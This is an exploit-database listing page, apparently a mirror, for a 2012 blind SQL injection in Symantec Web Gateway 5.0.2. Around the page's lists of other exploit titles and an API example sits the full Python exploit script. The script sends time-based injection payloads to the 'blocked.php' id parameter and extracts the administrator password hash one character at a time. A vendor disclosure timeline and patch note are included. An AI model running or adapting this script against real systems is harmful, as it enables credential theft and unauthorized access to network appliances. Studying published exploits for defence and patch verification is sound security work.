Menu

Improved exploit search engine. Try it out

"Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection"

Author

muts

Platform

linux

Release date

2012-07-23

Release Date Title Type Platform Author
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-01 "PowerPanel Business Edition - Cross-Site Scripting" webapps linux "Joey Lane"
2019-07-01 "Linux Mint 18.3-19.1 - 'yelp' Command Injection" remote linux b1ack0wl
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-20 "Linux - Use-After-Free via race Between modify_ldt() and #BR Exception" dos linux "Google Security Research"
2019-06-18 "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" local linux "Guy Levin"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2019-06-14 "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" local linux s4vitar
2019-06-11 "Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)" remote linux AkkuS
2019-06-10 "Ubuntu 18.04 - 'lxd' Privilege Escalation" local linux s4vitar
2019-06-05 "Exim 4.87 < 4.91 - (Local / Remote) Command Execution" remote linux "Qualys Corporation"
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-04 "Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution" local linux Arminius
2019-05-08 "NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass" webapps linux MobileNetworkSecurity
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-05-01 "CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting" webapps linux DKM
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
2019-04-23 "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition" dos linux "Google Security Research"
2019-04-23 "systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit" dos linux "Google Security Research"
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-08 "CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting" webapps linux DKM
2019-04-08 "Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation" local linux cfreal
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts
2007-06-03 "IBM Tivoli Provisioning Manager - Remote Overflow (Egghunter)" remote windows muts
2007-03-31 "IBM Lotus Domino Server 6.5 - Remote Overflow" remote windows muts
2007-03-21 "Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)" remote windows muts
2006-10-01 "McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)" remote windows muts
2006-08-26 "Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow" remote windows muts
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/20038/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/20038/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/20038/26678/symantec-web-gateway-502-blockedphpid-blind-sql-injection/download/", "exploit_id": "20038", "exploit_description": "\"Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection\"", "exploit_date": "2012-07-23", "exploit_author": "muts", "exploit_type": "webapps", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#!/usr/bin/python

######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.2
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 29 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################

import urllib
import time
import sys
from time import sleep

# Set your timing variable. A minimum value of 200 (2 seconds) was tested on localhost.
# This might need to be higher on production systems.

timing=300

def check_char(i,j,timing):

	url = 	("https://172.16.254.111/spywall/blocked.php?d=3&file=3&id=1)" +
		" or 1=(select IF(conv(mid((select password from users),%s,1),16,10) "+
		"= %s,BENCHMARK(%s,rand()),11) LIMIT 1&history=-2&u=3") % (j,i,timing)
	start=time.time()
	urllib.urlopen(url)
	end =time.time()
	howlong=int(end-start)
	return howlong

counter=0
startexploit=time.time()
print "[*] Symantec \"Wall of Spies\" hash extractor"
print "[*] Time Based SQL injection, please wait..."
sys.stdout.write("[*] Admin hash is : ")
sys.stdout.flush()

for m in range(1,33):
	for n in range(0,16):
		counter= counter+1
		output = check_char(n,m,timing)
		if output > ((timing/100)-1):
			byte =hex(n)[2:]
			sys.stdout.write(byte)
			sys.stdout.flush()
			break
endexploit=time.time()
totalrun=str(endexploit-startexploit)
print "\n[*] Total of %s queries in %s seconds" % (counter,totalrun)